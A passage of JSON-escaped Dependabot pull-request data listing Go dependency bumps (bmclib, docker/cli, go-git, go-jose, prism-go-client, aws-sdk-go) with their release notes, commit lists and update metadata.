href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.5.1+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/2518b52d948a0cbee071d394c03c86a3005636ba\"\u003e\u003ccode\u003e2518b52\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6991\"\u003e#6991\u003c/a\u003e from mickael-docker/docs-clarify-authz\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9f18a0a70c9228f5892594c6b56425b8bed1899f\"\u003e\u003ccode\u003e9f18a0a\u003c/code\u003e\u003c/a\u003e docs: clarify authz content type\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/2944fd1daa5d54315ab8fcd874ea9cb6199c6117\"\u003e\u003ccode\u003e2944fd1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6989\"\u003e#6989\u003c/a\u003e from thaJeztah/bump_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c41489ac3901885bb3891aef9cfe65ca69dc4580\"\u003e\u003ccode\u003ec41489a\u003c/code\u003e\u003c/a\u003e bump VERSION to v29.5.1-dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/98f14649600f05480629d5c481878b1e1bcb7c17\"\u003e\u003ccode\u003e98f1464\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6988\"\u003e#6988\u003c/a\u003e from thaJeztah/make_shell\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/50712c932660e7859d692b5aed45ad321beced1a\"\u003e\u003ccode\u003e50712c9\u003c/code\u003e\u003c/a\u003e README: simplify instructions for using dev container\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/653dc8f03d161677a8648758cdf0af8b150780bc\"\u003e\u003ccode\u003e653dc8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6485\"\u003e#6485\u003c/a\u003e from paulchen5/6484-update-pull-request-template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/13945822d4ba2119b867ee2cf215506c8b9f9817\"\u003e\u003ccode\u003e1394582\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6987\"\u003e#6987\u003c/a\u003e from thaJeztah/contributing_links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f99747b9e0bee5623a13655439e7a34b696e8617\"\u003e\u003ccode\u003ef99747b\u003c/code\u003e\u003c/a\u003e docs: fix stale links in CONTRIBUTING.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/ddac061db783a24d75b24cabc74793f6924d4724\"\u003e\u003ccode\u003eddac061\u003c/code\u003e\u003c/a\u003e PR template: remove outdated contributing guide link\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.19.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ev5: plumbing: transport/ssh, Shell-quote path by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2068\"\u003ego-git/go-git#2068\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, Fix relative URL resolution by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2070\"\u003ego-git/go-git#2070\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, canonical remote for relative URLs by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2074\"\u003ego-git/go-git#2074\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, error on remote without URLs by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2078\"\u003ego-git/go-git#2078\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format/idxfile, Validate offset64 indices by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2084\"\u003ego-git/go-git#2084\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: *: Reject malformed variable-length integers by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2092\"\u003ego-git/go-git#2092\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format/packfile, Tighten delta validation by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2091\"\u003ego-git/go-git#2091\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Add \u003ccode\u003eworktreeFilesystem\u003c/code\u003e wrapper for worktree and hardening by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2100\"\u003ego-git/go-git#2100\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: config: validate submodule names by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2082\"\u003ego-git/go-git#2082\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.19.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2111\"\u003ego-git/go-git#2111\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: Allow MkdirAll on worktree-root paths by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2117\"\u003ego-git/go-git#2117\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: Stop validating symlink target paths by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2116\"\u003ego-git/go-git#2116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format decoder input bounds and contracts by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2125\"\u003ego-git/go-git#2125\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eplumbing: format/packfile, cap delta chain depth in parser by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2137\"\u003ego-git/go-git#2137\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.19.0...v5.19.1\"\u003ehttps://github.com/go-git/go-git/compare/v5.19.0...v5.19.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/3c3be601aa6c0fd0d536c0d1e4f898b4c60e65fe\"\u003e\u003ccode\u003e3c3be60\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2137\"\u003e#2137\u003c/a\u003e from go-git/validate-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/3fba897bd9e84b1aec170fa708b80e297b7d6cf6\"\u003e\u003ccode\u003e3fba897\u003c/code\u003e\u003c/a\u003e plumbing: format/packfile, cap delta chain depth in parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a97d6601c85e017bb64c2b0f2e3169f6ef6a6709\"\u003e\u003ccode\u003ea97d660\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2125\"\u003e#2125\u003c/a\u003e from hiddeco/v5/format-input-bounds\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/aeaa125c8af8e4c4c95b574c22c5633e97fc436e\"\u003e\u003ccode\u003eaeaa125\u003c/code\u003e\u003c/a\u003e plumbing: format/objfile, require Header before Read\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1f38e171218526ea254a73187a52f0648253c1b8\"\u003e\u003ccode\u003e1f38e17\u003c/code\u003e\u003c/a\u003e plumbing: format/packfile, bound inflate size\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f7545a02529e03998d6a7219140dc0e6644ad337\"\u003e\u003ccode\u003ef7545a0\u003c/code\u003e\u003c/a\u003e plumbing: format/idxfile, bound nr by file size\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/170b88181f385913a457a08b68c88956fb3f8e4f\"\u003e\u003ccode\u003e170b881\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2116\"\u003e#2116\u003c/a\u003e from pjbgf/symlink-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/7b6d994467f06630268904aa3c441b6de7248b31\"\u003e\u003ccode\u003e7b6d994\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2117\"\u003e#2117\u003c/a\u003e from hiddeco/v5/worktree-fs-mkdirall-root-noop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f0709b32f8fbb87c16cd63c6762d2cd515f36541\"\u003e\u003ccode\u003ef0709b3\u003c/code\u003e\u003c/a\u003e git: Stop validating symlink target paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/776d00f11d336f26862d0f2bab987b217f3a7844\"\u003e\u003ccode\u003e776d00f\u003c/code\u003e\u003c/a\u003e git: Allow MkdirAll on worktree-root paths\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: adding API calls for dataPolicy by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/340\"\u003enutanix-cloud-native/prism-go-client#340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/341\"\u003enutanix-cloud-native/prism-go-client#341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adds the Nutanix Insights REST client by \u003ca href=\"https://github.com/sauravknx\"\u003e\u003ccode\u003e@​sauravknx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/339\"\u003enutanix-cloud-native/prism-go-client#339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: split error handling into contract and v4 implementation by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/342\"\u003enutanix-cloud-native/prism-go-client#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add ListNicsByVmId to VMs service by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/352\"\u003enutanix-cloud-native/prism-go-client#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: Add UUID in the URL path for UpdateK8sRegistration by \u003ca href=\"https://github.com/priyadarshini7q\"\u003e\u003ccode\u003e@​priyadarshini7q\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/335\"\u003enutanix-cloud-native/prism-go-client#335\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and rena...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10771","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10771","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10771/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-05-13T08:33:43.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4436240734","node_id":"PR_kwDOAOaWjc7bB66i","number":124765,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["area/backend","dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-14T02:17:17.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-13T08:33:43.000Z","updated_at":"2026-05-14T02:17:26.000Z","time_to_close":63814,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":9,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.32.15","new_version":"1.32.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.296.0","new_version":"1.299.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.11","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.32.15` | `1.32.16` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.56.2` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.296.0` | `1.299.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.16` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.11` |\n| 